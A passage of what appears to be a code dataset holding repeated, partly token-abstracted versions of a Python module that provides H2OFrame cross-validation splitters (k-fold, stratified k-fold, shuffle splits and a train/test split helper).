test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n 
random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = 
frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\ntry:\n from h2o import H2OEstimator\nexcept ImportError:\n from h2o.estimators.estimator_base import H2OEstimator\ntry:\n from sklearn.model_selection import KFold\n SK18 = True\nexcept ImportError:\n from sklearn.cross_validation import KFold\n SK18 = False\n__all__ = ['check_cv', 'h2o_train_test_split', 'H2OKFold',\n 'H2OShuffleSplit', 'H2OStratifiedKFold', 'H2OStratifiedShuffleSplit']\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. 
If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\nh2o_train_test_split.__test__ = False\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be 
None')\n    if test_size is not None:\n        if np.asarray(test_size).dtype.kind == 'f':\n            if test_size >= 1.0:\n                raise ValueError(\n                    'test_size=%f should be smaller than 1.0 or be an integer'\n                    % test_size)\n        elif np.asarray(test_size).dtype.kind != 'i':\n            raise ValueError('Invalid value for test_size: %r' % test_size)\n    if train_size is not None:\n        if np.asarray(train_size).dtype.kind == 'f':\n            if train_size >= 1.0:\n                raise ValueError(\n                    'train_size=%f should be smaller than 1.0 or be an integer'\n                    % train_size)\n            elif np.asarray(test_size\n                ).dtype.kind == 'f' and train_size + test_size > 1.0:\n                raise ValueError(\n                    'The sum of test_size and train_size = %f should be smaller than 1.0. Reduce test_size and/or train_size.'\n                    % (train_size + test_size))\n        elif np.asarray(train_size).dtype.kind != 'i':\n            raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n    if test_size is not None and np.asarray(test_size\n        ).dtype.kind == 'i' and test_size >= n_samples:\n        raise ValueError(\n            'test_size=%d should be smaller than the number of samples %d' %\n            (test_size, n_samples))\n    if train_size is not None and np.asarray(train_size\n        ).dtype.kind == 'i' and train_size >= n_samples:\n        raise ValueError(\n            'train_size=%d should be smaller than the number of samples %d' %\n            (train_size, n_samples))\n    if np.asarray(test_size).dtype.kind == 'f':\n        n_test = ceil(test_size * n_samples)\n    elif np.asarray(test_size).dtype.kind == 'i':\n        n_test = float(test_size)\n    if train_size is None:\n        n_train = n_samples - n_test\n    elif np.asarray(train_size).dtype.kind == 'f':\n        n_train = floor(train_size * n_samples)\n    else:\n        n_train = float(train_size)\n    if test_size is None:\n        n_test = n_samples - n_train\n    if n_train + n_test > n_samples:\n        raise ValueError(\n            'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n            % (n_train + n_test, n_samples))\n    return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n    \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n    is used for ``h2o_train_test_split`` in strategic train/test splits of\n    H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n    Parameters\n    ----------\n\n    n_splits : int, optional (default=2)\n        The number of folds or splits in the split\n\n    test_size : float or int, optional (default=0.1)\n        The ratio of observations for the test fold\n\n    train_size : float or int, optional (default=None)\n        The ratio of observations for the train fold\n\n    random_state : int or RandomState, optional (default=None)\n        The random state for duplicative purposes.
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\ntry:\n from h2o import H2OEstimator\nexcept ImportError:\n from h2o.estimators.estimator_base import H2OEstimator\ntry:\n from sklearn.model_selection import KFold\n SK18 = True\nexcept ImportError:\n from sklearn.cross_validation import KFold\n SK18 = False\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. 
If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.0:\n raise ValueError(\n 'test_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n raise ValueError('Invalid value for test_size: %r' % test_size)\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 
'f':\n            if train_size >= 1.0:\n                raise ValueError(\n                    'train_size=%f should be smaller than 1.0 or be an integer'\n                    % train_size)\n            elif np.asarray(test_size\n                ).dtype.kind == 'f' and train_size + test_size > 1.0:\n                raise ValueError(\n                    'The sum of test_size and train_size = %f should be smaller than 1.0. Reduce test_size and/or train_size.'\n                    % (train_size + test_size))\n        elif np.asarray(train_size).dtype.kind != 'i':\n            raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n    if test_size is not None and np.asarray(test_size\n        ).dtype.kind == 'i' and test_size >= n_samples:\n        raise ValueError(\n            'test_size=%d should be smaller than the number of samples %d' %\n            (test_size, n_samples))\n    if train_size is not None and np.asarray(train_size\n        ).dtype.kind == 'i' and train_size >= n_samples:\n        raise ValueError(\n            'train_size=%d should be smaller than the number of samples %d' %\n            (train_size, n_samples))\n    if np.asarray(test_size).dtype.kind == 'f':\n        n_test = ceil(test_size * n_samples)\n    elif np.asarray(test_size).dtype.kind == 'i':\n        n_test = float(test_size)\n    if train_size is None:\n        n_train = n_samples - n_test\n    elif np.asarray(train_size).dtype.kind == 'f':\n        n_train = floor(train_size * n_samples)\n    else:\n        n_train = float(train_size)\n    if test_size is None:\n        n_test = n_samples - n_train\n    if n_train + n_test > n_samples:\n        raise ValueError(\n            'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n            % (n_train + n_test, n_samples))\n    return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n    \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n    is used for ``h2o_train_test_split`` in strategic train/test splits of\n    H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n    Parameters\n    ----------\n\n    n_splits : int, optional (default=2)\n        The number of folds or splits in the split\n\n    test_size : float or int, optional (default=0.1)\n        The ratio of observations for the test fold\n\n    train_size : float or int, optional (default=None)\n        The ratio of observations for the train fold\n\n    random_state : int or RandomState, optional (default=None)\n        The random state for duplicative purposes.
